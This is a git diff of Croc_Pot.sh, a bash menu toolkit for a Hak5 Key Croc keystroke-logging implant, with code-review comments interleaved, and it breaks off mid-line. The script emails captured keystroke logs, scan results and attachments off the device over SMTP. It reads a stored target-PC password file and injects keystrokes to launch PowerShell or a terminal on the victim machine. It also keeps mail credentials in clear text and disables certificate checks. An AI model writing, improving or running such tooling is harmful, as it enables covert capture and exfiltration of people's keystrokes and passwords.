diff --git a/payloads/library/general/Croc_Pot/Croc_Pot.sh b/payloads/library/general/Croc_Pot/Croc_Pot.sh index cff8afa..abbf9ff 100644 --- a/payloads/library/general/Croc_Pot/Croc_Pot.sh +++ b/payloads/library/general/Croc_Pot/Croc_Pot.sh @@ -5,7 +5,7 @@ # Description: Send E-mail, Status of keycroc, Basic Nmap, TCPdump, Install payload, # SSH to HAK5 gear, Reverse ssh tunnel, and more # Author: Spywill -# Version: 1.5.9 +# Version: 1.6.7 # Category: Key Croc ## ## @@ -14,6 +14,8 @@ LINE=$(perl -e 'print "=" x 80,"\n"') LINE_=$(perl -e 'print "*" x 10,"\n"') LINE_A=$(perl -e 'print "-" x 15,"\n"') +#----Validate IP v4 or v6 address +validate_ip="^(((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|((([0-9A-Fa-f]{1,4}:){7}([0-9A-Fa-f]{1,4}|:))|(([0-9A-Fa-f]{1,4}:){6}(:[0-9A-Fa-f]{1,4}|((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){5}(((:[0-9A-Fa-f]{1,4}){1,2})|:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]{1,4}){0,2}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){2}(((:[0-9A-Fa-f]{1,4}){1,5})|((:[0-9A-Fa-f]{1,4}){0,3}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){1}(((:[0-9A-Fa-f]{1,4}){1,6})|((:[0-9A-Fa-f]{1,4}){0,4}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(:(((:[0-9A-Fa-f]{1,4}){1,7})|((:[0-9A-Fa-f]{1,4}){0,5}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))))$" ## #----Create Croc_Pot folders ## 
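Review bot: The IPv6 branches of `validate_ip` use `\d`, which is a PCRE escape and not part of the POSIX ERE syntax that `[[ … =~ … ]]` compiles, so the embedded-IPv4 forms (for example `::ffff:192.0.2.1`, a constructed sample) will probably not match as intended. Replace each `\d` with `[0-9]`, as the IPv4 branch at the start of the pattern already does. That IPv4 branch also accepts leading zeros (`[01]?[0-9][0-9]?`), which some tools read as octal, so consider rejecting them. The comment above the variable should add that it must be used unquoted on the right of `=~`, since quoting it there turns the pattern into a literal string.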
@@ -28,8 +30,10 @@ fi
 green='\e[40;32m'
 blue='\e[40;34m'
 red='\e[40;31m'
-white='\e[97m'
+white='\e[40;97m'
 yellow='\e[40;93m'
+pink="\e[40;35m"
+cyan="\e[40;36m"
 clear='\e[0m'
 ##
 #----Color Functions
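Review bot: `pink` and `cyan` are written with double quotes while every other colour variable in this block uses single quotes. Write them as `pink='\e[40;35m'` and `cyan='\e[40;36m'` so the block stays uniform and nothing inside the escape is open to expansion.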
@@ -49,61 +53,75 @@ ColorRed() { ## #----All Menu color Functions ## -MenuTitle() { +function MenuTitle() { echo -ne "\n\t\t\t\e[41;4;1m${*}${clear}\n" } -MenuColor() { - echo -ne "\t\t\t\e[40;1m${1}${clear}${green}->${clear}\e[40;38;5;202;4m${@:2}" +function MenuColor() { + local m_c='\e[40;38;5;202;4m' + echo -ne "\t\t\t\e[40;1m${2}${clear}${green}->${clear}" ; echo -ne "$(awk -v m=${1} '{printf("'${m_c}'%-'${1}'s\n", $0)}' <<< ${@:3})${clear}\n" } -MenuEnd() { - echo -ne "\t\t\t\e[40;1m0${clear}${green}->${clear}\e[40;4;32mEXIT ${array[3]} ${clear} -\t\t$(ColorBlue 'CHOOSE AN OPTION AND PRESS [ENTER]: ')" +function MenuEnd() { + unset chartCount + unset u_a unset m_a - read m_a + echo -ne "\t\t\t\e[40;1m0${clear}${green}->${clear}\e[40;4;32mEXIT $(awk -v m=${1} '{printf("%-'${1}'s'${clear}${green}${array[3]}' '${clear}'\n", $0)}' <<< ${green})\n" + echo -ne "\t\t\e[38;5;19;1;48;5;245mCHOOSE AN OPTION AND PRESS [ENTER]:${clear}" +while IFS= read -r -n1 -s u_a; do + case "$u_a" in + $'\0') + break ;; + $'\177') + if [ ${#m_a} -gt 0 ]; then + echo -ne "\b \b" + m_a=${m_a::-1} + fi ;; + *) + chartCount=$((chartCount+1)) + echo -ne "\e[48;5;202;30m${u_a}${clear}" + m_a+="$u_a";; + esac +done +echo -ne "\n" } -Info_Screen() { - echo -ne "\n\e[48;5;202;30m${LINE}${clear}\n${yellow}${*}\n\e[48;5;202;30m${LINE}${clear}\n" +## +#----Display info/how to +## +function Info_Screen() { + echo -ne "\n\e[48;5;202;30m${LINE}${clear}" | awk -v m=80 '{printf("%-80s\n", $0)}' + echo -ne "${1}" | awk -v m=80 '{printf("'${yellow}'%-80s'${clear}'\n", $0)}' | sed '1d' + echo -ne "\e[48;5;202;30m${LINE}${clear}" | awk -v m=80 '{printf("%-80s\n", $0)}' } ## #----Croc_Pot title function ## function croc_title() { + local k_b=$(awk -v m=24 '{printf("%-24s\n", $0)}' <<< $(lsusb | sed -n '/Linux Foundation\|Realtek Semiconductor/!p' | sed 's/^.*ID/ID/' | sed 's/ID//' | sed 's/,//' | awk '{print $1,$2}')) ## #----Test internet connection ## internet_test() { ping -q -c 1 -w 1 "8.8.8.8" 
&>"/dev/null" -if [[ "${?}" -ne 0 ]]; then - echo -ne "${red}Offline" +if [[ $? -ne 0 ]]; then + echo -ne "Offline" | awk -v m=10 '{printf("'${red}'%-10s\n", $0)}' elif [[ "${#args[@]}" -eq 0 ]]; then - echo -ne "${green}Online " -fi -} -## -#----Fill in space -## -FILL_IN() { -if [ "$(OS_CHECK)" = WINDOWS ]; then - echo -ne " " -elif [ "$(OS_CHECK)" = LINUX ]; then - echo -ne " " + echo -ne "Online" | awk -v m=10 '{printf("'${green}'%-10s\n", $0)}' fi } ## #----Croc_Pot title display info ## echo -ne "\n\n\e[41;38;5;232m${LINE}${clear} -${red}${LINE_A}${clear}\e[40m»${clear}${red}KEYCROC${clear}\e[40m-${clear}${red}HAK${clear}\e[40m${array[0]} ${clear}\e[40m«${clear}${red}---------${clear}\e[41;38;5;232m${array[1]}${clear}${yellow} $(hostname) IP: $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-) $(internet_test) ${clear} -${red} DEVELOPED BY ${clear}\e[40mSPYWILL ${clear}\e[40m ${clear}\e[41;38;5;232m§${clear}${yellow} $(hostname) VER: $(cat /root/udisk/version.txt) *TARGET-PC:${green}$(OS_CHECK)$(FILL_IN)${clear} -${red} DATE OF SCAN${clear}\e[40m $(date +%b-%d-%y---%r)${clear}\e[41;38;5;232mΩ${clear}${yellow} $(hostname) keyboard: $(sed -n 9p /root/udisk/config.txt) ${clear} -${red}${LINE_A}${clear}\e[40;92m»CROC_POT«${red}--${clear}${yellow}VER:1.5.9${red}---${clear}\e[41;38;5;232m${array[2]}${clear}${yellow} CPU TEMP:$(cat /sys/class/thermal/thermal_zone0/temp)°C USAGE:$(top -bn1 | grep "Cpu(s)" | sed "s/.*, *\([0-9.]*\)%* id.*/\1/" | awk '{print 100 - $1"%"}') MEM:$(free -m | awk 'NR==2{printf "%.2f%%", $3/$2*100 }') ${clear} +${green}»»»»»»»»»»»» CROC_POT ««««««««${clear}${yellow}VER:1.6.7${clear}${green}${clear}\e[41;38;5;232m${array[1]}${clear}${yellow} $(hostname) IP: $(awk -v m=20 '{printf("%-20s\n", $0)}' <<< $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-))${clear}$(internet_test)${clear} +${blue}DEVELOPED BY ${clear}${yellow}SPYWILL${clear}${cyan} $(awk -v m=16 '{printf("%-16s\n", $0)}' <<< $(uptime -p | sed 
's/up/UP:/g' | sed 's/hours/hr/g' | sed 's/hour/hr/g' | sed 's/,//g' | sed 's/minutes/min/g' | sed 's/minute/min/g'))${clear}\e[41;38;5;232m§${clear}${yellow} $(hostname) VER: $(cat /root/udisk/version.txt) ${clear}${cyan}*${clear}${yellow}TARGET-PC:${clear}${green}$(awk -v m=10 '{printf("%-10s\n", $0)}' <<< $(OS_CHECK))${clear} +${blue}$(awk -v m=17 '{printf("%-17s\n", $0)}' <<< $(curl -Lsf --connect-timeout 2 --max-time 2 http://ip-api.com/line?fields=timezone))${clear}${cyan} $(date +%b-%d-%y-%r)${clear}\e[41;38;5;232mΩ${clear}${yellow} keyboard:${clear}${green}$(sed -n 9p /root/udisk/config.txt | sed 's/DUCKY_LANG //g' | sed -e 's/\(.*\)/\U\1/') ${clear}${yellow}ID:${clear}${green}${k_b}${clear} +\e[40;38;5;202m»»»»»»»»»»»» ${clear}${red}KEYCROC${clear}\e[40m-${clear}${red}HAK${clear}\e[40m${array[0]}${clear}\e[40;38;5;202m «««««««««««««${clear}\e[41;38;5;232m${array[2]}${clear}${yellow} CPU TEMP:${clear}${cyan}$(cat /sys/class/thermal/thermal_zone0/temp)°C${clear}${yellow} USAGE:${clear}${cyan}$(awk -v m=6 '{printf("%-6s\n", $0)}' <<< $(top -bn1 | grep "Cpu(s)" | sed "s/.*, *\([0-9.]*\)%* id.*/\1/" | awk '{print 100 - $1"%"}'))${clear}${yellow}MEM:${clear}${cyan}$(awk -v m=8 '{printf("%-8s\n", $0)}' <<< $(free -m | awk 'NR==2{printf "%.2f%%", $3/$2*100 }'))${clear} \e[41;38;5;232m${LINE}${clear}\n\n" } ## #----Croc_Pot title for loot ## function croc_title_loot() { - echo -ne "\n${LINE}\n\t${LINE_A}>KEYCROC-HAK5<${LINE_A}\n\t\tDEVELOPED BY SPYWILL\n\t\tDATE OF SCAN-$(date +%b-%d-%y---%r)\n\t${LINE_A}>CROC_POT<${LINE_A}\n${LINE}\n\n" + echo -ne "\n${LINE}\n\t${LINE_A}>CROC_POT<${LINE_A}\n\t\tDEVELOPED BY SPYWILL\n\t\tDATE OF SCAN-$(date +%b-%d-%y---%r)\n\t${LINE_A}>KEYCROC-HAK5<${LINE_A}\n${LINE}\n\n" } ## #----Croc_Pot invalid entry 
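Review bot: `croc_title` now runs `curl -Lsf --connect-timeout 2 --max-time 2 http://ip-api.com/line?fields=timezone` inside the banner, so every redraw sends a plain-HTTP request to a third party and pastes the unauthenticated response into `echo -ne`, where any escape sequences in it are interpreted by the terminal. Anyone on the network path can alter that response, and the request is repeated each time a menu is shown, adding up to two seconds per redraw. Fetch the value once, strip it to expected characters (for example `tr -cd '[:alnum:]/_+-'`) and print it with `printf '%s'`, or take the zone from the local clock with `date +%Z` if that is what the field is for. The URL should also be quoted, since the unquoted `?` is a glob character.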
@@ -114,11 +132,29 @@ function invalid_entry() {
 sleep 1
 }
 ##
-#----read user input
+#----read user input/add color
 ##
 function read_all() {
+ unset chartCount
+ unset a_r
 unset r_a
- echo -ne "${blue}${*}:${clear}"; read r_a
+ echo -ne "\e[38;5;19;1;48;5;245m${*}:${clear}"
+while IFS= read -r -n1 -s a_r; do
+ case "$a_r" in
+ $'\0')
+ break ;;
+ $'\177')
+ if [ ${#r_a} -gt 0 ]; then
+ echo -ne "\b \b"
+ r_a=${r_a::-1}
+ fi ;;
+ *)
+ chartCount=$((chartCount+1))
+ echo -ne "\e[48;5;202;30m${a_r}${clear}"
+ r_a+="$a_r" ;;
+ esac
+done
+echo -ne "\n"
 }
 ##
 #----Check for OS keycroc is pluged into usb
@@ -156,7 +192,7 @@ fi 2> /dev/null
 ##
 #----Check for target pc passwd
 ##
-target_pw() {
+function target_pw() {
 if [ -e "/root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered" ]; then
 echo -ne "$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)\n"
 else
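Review bot: The character-by-character loop in `read_all` is the third copy of the same code in this commit (`MenuEnd` and `user_input_passwd` carry the others), and each copy increments `chartCount` without reading it in the lines shown. Move the loop into one helper so a fix to backspace or control-character handling lands in all three. As written, every byte other than Enter and DEL is appended to `r_a`, including escape sequences from arrow keys, and `r_a` is later expanded unquoted into commands elsewhere in the diff. Putting `[[ $a_r == [[:print:]] ]] || continue` at the top of the `*)` arm would drop non-printable input before the append. `${r_a::-1}` needs bash 4.2 or newer, which is worth a comment.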
@@ -175,13 +211,106 @@ case $r_a in apt -y install ${1} ;; [nN] | [nN][oO]) echo -ne "\n$(ColorYellow 'Maybe next time')\n" - ${4} ;; + ${4} + clear ;; *) invalid_entry ; ${3} ;; esac fi } ## +#----Replace user input with Asterisk (*) +## +function user_input_passwd() { + unset password + unset chartCount + echo -ne "\e[38;5;19;1;48;5;245mENTER ${2} PASSWORD AND PRESS [ENTER]:${clear}" +while IFS= read -r -n1 -s char; do + case "$char" in +$'\0') + break ;; +$'\177') + if [ ${#password} -gt 0 ]; then + echo -ne "\b \b" + password=${password::-1} + fi ;; +*) + chartCount=$((chartCount+1)) + echo -ne "\e[48;5;202;30m*${clear}" + password+="$char" ;; + esac +done + echo $password >> ${1} + echo -ne "\n" +} +## +#----Start web brower on target pc +## +function start_web() { +if [ "$(OS_CHECK)" = WINDOWS ]; then + Q GUI d + Q GUI r + sleep 1 + Q STRING "powershell" + Q ENTER + sleep 2 + Q STRING "Start-Process ${1}; exit" + Q ENTER +else + case $HOST_CHECK in +raspberrypi) + Q GUI d + sleep 1 + Q STRING "LXTerminal" + Q ENTER + Q ENTER + sleep 1 + Q STRING "gio open ${1}; exit" + Q ENTER ;; +parrot) + Q ALT F2 + sleep 1 + Q STRING "mate-terminal" + Q ENTER + sleep 1 + Q STRING "gio open ${1}; exit" + Q ENTER ;; +*) + Q ALT F2 + sleep 1 + Q STRING "xterm" + Q ENTER + sleep 1 + Q STRING "gio open ${1}; exit" + Q ENTER ;; + esac +fi +} +## +#----display Countdown in minute and seconds +## +function Countdown() { + min=${1} + sec=${2} + echo -ne "${green}" +while [ $min -ge 0 ]; do + while [ $sec -ge 0 ]; do + if [ "$min" -eq "0" ] && [ "$sec" -le "59" ]; then + echo -ne "${yellow}" + fi + if [ "$min" -eq "0" ] && [ "$sec" -le "10" ]; then + echo -ne "${red}" + fi + echo -ne "$(printf "%02d" $min):$(printf "%02d" $sec)\033[0K\r" + let "sec=sec-1" + sleep 1 + done + sec=59 + let "min=min-1" +done + echo -ne "${clear}" +} +## #----KeyCroc Log mean/function ## function croc_logs_mean() { 
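Review bot: `user_input_passwd` writes the secret with `echo $password >> ${1}`; unquoted, a password containing spaces, `*` or `?` is word-split and glob-expanded before it reaches the file, and one that starts with `-n` or `-e` is taken as an option to `echo`. Use `printf '%s\n' "$password" >> "${1}"`. `char` and `password` are also left as globals when the function returns, so the clear-text password stays in the shell for the rest of the session; declare `local char` and `unset password` after the write, unless a caller outside this hunk reads it. `Countdown` has the same scoping problem with `min` and `sec`, which should be `local` and quoted in the `[ … ]` tests.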
@@ -189,15 +318,15 @@ function croc_logs_mean() { LED B croc_title MenuTitle KEYCROC LOG MENU -echo -ne "\t\t" ; MenuColor 1 MESSAGES LOG | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 8 AUTH LOG | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 2 KERNEL LOG | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 9 DMESG LOG | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 3 SYSTEM LOG | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 10 BOOTSTRAP LOG | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 4 SYSSTAT LOG | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 11 ALTERNATIVES LOG | tr -d '\t' ; echo -ne "${clear}\n" -echo -ne "\t\t" ; MenuColor 5 DEBUG LOG | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 12 MAIL INFO LOG | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 6 DPKG LOG | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 13 DAEMON LOG | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 7 NTPSTATS LOG | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 14 KEYSTROKES LOG | tr -d '\t' ; echo -ne " ${clear}\n" -MenuColor 15 RETURN TO MAIN MENU ; echo -ne "${clear}\n" -MenuEnd +echo -ne "\t\t" ; MenuColor 19 1 MESSAGES LOG | tr -d '\t\n' ; MenuColor 20 8 AUTH LOG | tr -d '\t' +echo -ne "\t\t" ; MenuColor 19 2 KERNEL LOG | tr -d '\t\n' ; MenuColor 20 9 DMESG LOG | tr -d '\t' +echo -ne "\t\t" ; MenuColor 19 3 SYSTEM LOG | tr -d '\t\n' ; MenuColor 19 10 BOOTSTRAP LOG | tr -d '\t' +echo -ne "\t\t" ; MenuColor 19 4 SYSSTAT LOG | tr -d '\t\n' ; MenuColor 19 11 ALTERNATIVES LOG | tr -d '\t' +echo -ne "\t\t" ; MenuColor 19 5 DEBUG LOG | tr -d '\t\n' ; MenuColor 19 12 MAIL INFO LOG | tr -d '\t' +echo -ne "\t\t" ; MenuColor 19 6 DPKG LOG | tr -d '\t\n' ; MenuColor 19 13 DAEMON LOG | tr -d '\t' +echo -ne "\t\t" ; MenuColor 19 7 NTPSTATS LOG | tr -d '\t\n' ; MenuColor 19 14 KEYSTROKES LOG | tr -d '\t' +MenuColor 19 15 RETURN TO MAIN MENU +MenuEnd 23 case $m_a in 1) croc_title_loot | tee ${LOOT_LOG} ; echo 
-e "\t${LINE_}MESSAGES_LOG${LINE_}\n" | tee -a ${LOOT_LOG} ; cat /var/log/messages | tee -a ${LOOT_LOG} ; croc_logs_mean ;; 2) croc_title_loot | tee ${LOOT_LOG} ; echo -e "\t${LINE_}KERNEL_LOG${LINE_}\n" | tee -a ${LOOT_LOG} ; cat /var/log/kern.log | tee -a ${LOOT_LOG} ; croc_logs_mean ;; 
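Review bot: The new first argument to `MenuColor` is an undocumented pad width, and the call sites here switch between `19` and `20` by hand to compensate for one- versus two-digit option numbers (`MenuColor 20 8 AUTH LOG` next to `MenuColor 19 10 BOOTSTRAP LOG`). Add a comment above `MenuColor` such as `# $1 = label pad width, $2 = option number, $3… = label`, or have the function derive the pad from `${#2}` so callers pass a single column width. `MenuEnd 23` carries the same unexplained number. The `case` arms of `croc_logs_mean` continue outside this hunk.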
@@ -227,62 +356,30 @@ function croc_mail() { local PYTHON_MAIL=/root/udisk/tools/Croc_Pot/Croc_Mail.py local USER_CR=/root/udisk/tools/Croc_Pot/user_email.txt LED B - echo -ne "$(Info_Screen '-Send E-Mail with gmail or OutLook + echo -ne "$(Info_Screen ' +-Send E-Mail with gmail or OutLook -Select gmail or outlook then Enter e-mail address -Enter e-mail password then Enter the e-mail to send to -Add MESSAGE and/or Add Attachment')\n\n" ## -#----User Smtp input Function +#----User Smtp Menu input Function ## user_smtp() { -MenuTitle SELECT EMAIL PROVIDER -MenuColor 1 GMAIL ; echo -ne " ${clear}\n" -MenuColor 2 OUTLOOK ; echo -ne " ${clear}\n" -MenuColor 3 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle SELECT EMAIL PROVIDER ; MenuColor 19 1 GMAIL ; MenuColor 19 2 OUTLOOK ; MenuColor 19 3 RETURN TO MAIN MENU ; MenuEnd 22 case $m_a in - 1) local GMAIL=smtp.gmail.com ; echo ${GMAIL} >> ${USER_CR} ;; - 2) local OUTLOOK=smtp-mail.outlook.com ; echo ${OUTLOOK} >> ${USER_CR} ;; - 3) main_menu ;; - 0) exit 0 ;; - *) invalid_entry ; user_smtp ;; + 1) local GMAIL=smtp.gmail.com ; echo ${GMAIL} >> ${USER_CR} ;; 2) local OUTLOOK=smtp-mail.outlook.com ; echo ${OUTLOOK} >> ${USER_CR} ;; 3) main_menu ;; 0) exit 0 ;; [bB]) main_menu ;; *) invalid_entry ; user_smtp ;; esac } ## #----User E-mail input Function ## user_email_set() { -## -#----Replace user input with Asterisk (*) -## -user_input_passwd() { -unset password -unset chartCount -echo -n "$(ColorBlue 'ENTER E-MAIL PASSWORD AND PRESS [ENTER]:')" -while IFS= read -r -n1 -s char; do -case "$char" in -$'\0') - break ;; -$'\177') - if [ ${#password} -gt 0 ]; then - echo -ne "\b \b" - password=${password::-1} - fi ;; -*) - chartCount=$((chartCount+1)) - echo -n '*' - password+="$char" ;; -esac -done - echo $password >> ${USER_CR} - echo "" -} -read_all ENTER E-MAIL ADDRESS AND PRESS [ENTER] ; echo ${r_a} >> ${USER_CR} -user_input_passwd -read_all ENTER E-MAIL TO SEND LOOT TO AND PRESS [ENTER] ; echo ${r_a} >> 
${USER_CR} + read_all ENTER E-MAIL ADDRESS AND PRESS [ENTER] ; echo ${r_a} >> ${USER_CR} + user_input_passwd ${USER_CR} E_MAIL + read_all ENTER E-MAIL TO SEND LOOT TO AND PRESS [ENTER] ; echo ${r_a} >> ${USER_CR} } ## -#----Python file send Function +#----Python send file variables to change between files ## mail_file() { clear @@ -298,7 +395,7 @@ python_v() { FILE_I_B="${CHANGE_FILE_A}" } ## -#----Mail all file Function +#----Mail Function user input to setup python file variables ## send_all_file() { if [ -e "${1}" ]; then @@ -312,10 +409,10 @@ else fi } ## -#----Mail Attachment Function +#----Mail user enter path to Attachment Function ## send_file_e() { -echo -ne "${blue}ENTER THE PATH TO ATTACHMENT AND PRESS [ENTER]:${clear}"; read s_a + read_all ENTER THE PATH TO ATTACHMENT AND PRESS [ENTER] ; s_a=${r_a} if [ -e "${s_a}" ]; then local CHANGE_FILE="P" local CHANGE_FILE_A="'${s_a}'" @@ -326,7 +423,7 @@ else fi } ## -#----Mail keystorkes Function +#----Mail send saved keystorkes file Function ## send_file_f() { local KEY_ST=/root/udisk/loot/croc_char.log 
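Review bot: `user_email_set` stores the mail account's address and password as clear-text lines in `user_email.txt` on the device's storage, and later code in this diff reads them back by fixed line number (`sed -n 3p ${USER_CR}`). Anyone who can read that storage gets a working mail login, so the file should be created under `umask 077` where the filesystem honours it and removed when it is no longer needed. Because every write is an append (`>>`), a second pass through `user_smtp` or `user_email_set` without deleting the file shifts the line numbers; write the values in one `printf '%s\n' … > "${USER_CR}"` instead. `echo ${r_a} >> ${USER_CR}` should be `printf '%s\n' "$r_a" >> "${USER_CR}"` so the input is not word-split or globbed.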
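Review bot: In `send_file_e` the path typed by the user goes into `CHANGE_FILE_A="'${s_a}'"`, that is, it is wrapped in single quotes and later pasted into the generated `Croc_Mail.py`; a path containing `'` or a backslash ends the Python string early and the remainder is parsed as Python. The same applies to `message = '${MY_MESS_A}'` and to the `email`, `password` and `send_to_email` lines that `python_email` writes in the `@@ -342,48 +439,78 @@` hunk. Pass the values to a fixed script through the environment or `sys.argv` instead of generating source, or at least reject input that contains `'`, `\` or a newline before it is stored. The body of `send_file_e` continues outside this hunk.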
@@ -342,48 +439,78 @@ fi ## #----Croc Mail Select File Menu ## -MenuTitle SELECT FILE TO E-MAIL -MenuColor 1 NMAP SCAN ; echo -ne " ${clear}\n" -MenuColor 2 KEYCROC LOG ; echo -ne " ${clear}\n" -MenuColor 3 WINDOW SCAN ; echo -ne " ${clear}\n" -MenuColor 4 KEYCROC INFO ; echo -ne " ${clear}\n" -MenuColor 5 ADD ATTACHMENT ; echo -ne " ${clear}\n" -MenuColor 6 KEYSTORKES LOG ; echo -ne " ${clear}\n" -MenuColor 7 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle SELECT FILE TO E-MAIL ; MenuColor 19 1 NMAP SCAN ; MenuColor 19 2 KEYCROC LOG ; MenuColor 19 3 WINDOW SCAN ; MenuColor 19 4 KEYCROC INFO +MenuColor 19 5 ADD ATTACHMENT ; MenuColor 19 6 KEYSTORKES LOG ; MenuColor 19 7 RETURN TO MAIN MENU ; MenuEnd 22 case $m_a in - 1) send_all_file /root/udisk/loot/Croc_Pot/KeyCroc_NMAP.txt B NMAP SCAN nmap_menu ;; - 2) send_all_file /root/udisk/loot/Croc_Pot/KeyCroc_LOG.txt C KEYCROC LOG croc_logs_mean ;; - 3) send_all_file /root/udisk/loot/Croc_Pot/KeyCroc_Wind_LOG.txt D WINDOWS SCAN croc_pot_plus ;; - 4) send_all_file /root/udisk/loot/Croc_Pot/KeyCroc_INFO.txt E KEYCROC STATUS croc_status ;; - 5) send_file_e ;; - 6) send_file_f ;; - 7) main_menu ;; - 0) exit 0 ;; - *) invalid_entry ; mail_file ;; + 1) send_all_file /root/udisk/loot/Croc_Pot/KeyCroc_NMAP.txt B NMAP SCAN nmap_menu ;; 2) send_all_file /root/udisk/loot/Croc_Pot/KeyCroc_LOG.txt C KEYCROC LOG croc_logs_mean ;; 3) send_all_file /root/udisk/loot/Croc_Pot/KeyCroc_Wind_LOG.txt D WINDOWS SCAN croc_pot_plus ;; + 4) send_all_file /root/udisk/loot/Croc_Pot/KeyCroc_INFO.txt E KEYCROC STATUS croc_status ;; 5) send_file_e ;; 6) send_file_f ;; 7) main_menu ;; 0) exit 0 ;; *) invalid_entry ; mail_file ;; esac } ## -#----Python E-mail Function +#----Create Python E-mail file Function ## python_email() { rm ${PYTHON_MAIL} 2> /dev/null - sleep 1 echo -ne "import smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n from email.mime.base import MIMEBase\nfrom email import 
encoders\nimport os.path\n\nemail = '$(sed -n 2p ${USER_CR})'\npassword = '$(sed -n 3p ${USER_CR})'\nsend_to_email = '$(sed -n 4p ${USER_CR})'\n -subject = 'CROC_MAIL'\nmessage = '${r_a}${MY_MESS_A}'\n${FILE_A_B} ${FILE_I_B}\n +subject = 'CROC_MAIL'\nmessage = '${MY_MESS_A}'\n${FILE_A_B} ${FILE_I_B}\n msg = MIMEMultipart()\nmsg['From'] = email\nmsg['To'] = send_to_email\nmsg['Subject'] = subject\nmsg.attach(MIMEText(message, 'plain'))\n ${FILE_B_B}\n${FILE_C_B}\n${FILE_D_B}\n${FILE_E_B}\n${FILE_F_B}\n${FILE_G_B}\n ${FILE_H_B}\nserver = smtplib.SMTP('$(sed -n 1p ${USER_CR})', 587)\nserver.starttls()\nserver.login(email, password)\n text = msg.as_string()\nserver.sendmail(email, send_to_email, text)\nserver.quit()" >> ${PYTHON_MAIL} - sleep 1 python ${PYTHON_MAIL} } ## #----Mail check for existing email ## if [ -e "${USER_CR}" ]; then -echo -ne "${yellow}EXISTING E-MAIL${clear} ${green}$(sed -n 2p ${USER_CR})${clear}\n" +echo -ne "${yellow}EXISTING E-MAIL: ${clear}${green}$(sed -n 2p ${USER_CR})${clear}\n" +## +#----Mail check existing email for new messages gmail only +## +local check_gmail="$(sed -n 1p /root/udisk/tools/Croc_Pot/user_email.txt)" +if [[ "${check_gmail}" == "smtp.gmail.com" ]]; then +read_all CHECK E-MAIL FOR NEW MESSAGES Y/N AND PRESS [ENTER] +case $r_a in +[yY] | [yY][eE][sS]) + local USER="$(sed -n 2p /root/udisk/tools/Croc_Pot/user_email.txt)" + local PASS="$(sed -n 3p /root/udisk/tools/Croc_Pot/user_email.txt)" + local check_inbox=`echo wget -T 3 -t 1 -q --secure-protocol=TLSv1 --no-check-certificate \ --user=$USER --password=$PASS https://mail.google.com/mail/feed/atom -O -` + ${check_inbox} | while IFS=\> read -d \< E C; do +if [[ $E = "fullcount" ]] ; then + if [[ $C == 0 ]]; then + echo -ne "\n${yellow}No New Messages...${clear}\n" + break +else + echo -ne "\n${yellow}New Messages: ${clear}${green}$C${clear}\n" + echo -ne "${LINE}\n" + fi +fi +if [[ $E = "title" ]]; then + echo -ne "\n${LINE}\n$C" +fi +if [[ $E = "issued" ]]; then + echo " 
